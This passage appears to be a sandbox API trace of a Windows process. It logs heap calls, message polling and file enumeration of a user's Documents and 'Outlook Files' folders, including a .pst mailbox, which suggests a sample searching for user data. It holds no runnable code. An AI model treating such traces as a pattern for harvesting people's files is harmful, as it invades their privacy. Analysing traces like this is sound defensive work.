wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0074.071] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.071] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.071] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1baa3d0, ftCreationTime.dwHighDateTime=0x1d5e0e3, ftLastAccessTime.dwLowDateTime=0x2088d820, ftLastAccessTime.dwHighDateTime=0x1d58a7a, ftLastWriteTime.dwLowDateTime=0x2088d820, ftLastWriteTime.dwHighDateTime=0x1d58a7a, nFileSizeHigh=0x0, nFileSizeLow=0x111a6, dwReserved0=0x10, dwReserved1=0x657690, cFileName="osHJNd6e0L0ZQQ8NT.xlsx", cAlternateFileName="OSHJND~1.XLS")) returned 1 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.071] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.071] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.071] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690b60 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x6b9a28 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b330 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.072] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b360 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de28 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ba0 [0074.072] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c70 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ba0 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.072] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690b60 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690bd0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c10 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.073] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0074.073] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b378 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690bf0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b300 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.073] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b318 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cb0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c50 [0074.073] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Outlook Files", cchCount1=13, lpString2="AppData", cchCount2=7) returned 3 [0074.073] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.073] PeekMessageW (in: lpMsg=0x61e4d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e4d4) returned 0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690ac0 [0074.073] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c70 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692d08 [0074.073] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0074.073] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dec8 [0074.073] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3d8 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c30 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3f0 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b390 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b480 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ca0 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b3c0 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.074] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.074] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8af8 [0074.075] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.075] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0e8 | out: lpFindFileData=0x61e0e8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x2020e02, dwReserved1=0x657690, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e080 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b528 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690ce0 [0074.075] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690d00 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.075] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.075] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690d00 [0074.075] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c20 [0074.075] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c20 [0074.075] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b510 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c20 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.075] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cf0 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x6b9a28 [0074.076] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.076] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cf0 [0074.076] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cf0 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b510 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.076] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x1180068, ftCreationTime.dwLowDateTime=0xc2c68, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0xfffffffe, ftLastWriteTime.dwHighDateTime=0x1240069, nFileSizeHigh=0xc2c68, nFileSizeLow=0x76b3f0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="뚀詏\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4c8 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b540 [0074.076] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c80 [0074.076] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb0c0 [0074.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cf0 [0074.093] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.093] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b540 [0074.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c80 [0074.094] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b528 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690d00 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e080 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b540 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0074.094] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b858 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690cb0 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de50 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b420 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3a8 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ad0 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df90 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b468 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ac0 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df68 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e058 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c50 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfb8 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b450 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b408 | out: hHeap=0x650000) returned 1 [0074.094] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b438 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c60 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dea0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c40 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df40 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692d08 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ce0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b390 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3f0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3d8 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c30 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dec8 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b3c0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b480 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ca0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de78 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b318 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c70 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690ba0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690b60 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bd0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690c10 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bf0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68ddd8 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b330 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x764cc0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x690bc0 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2b8 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b360 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b378 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b300 | out: hHeap=0x650000) returned 1 [0074.095] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b348 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b2d0 | out: hHeap=0x650000) returned 1 [0074.096] HeapFree (in: hHeap=0x650000, dwFlags=0x0, 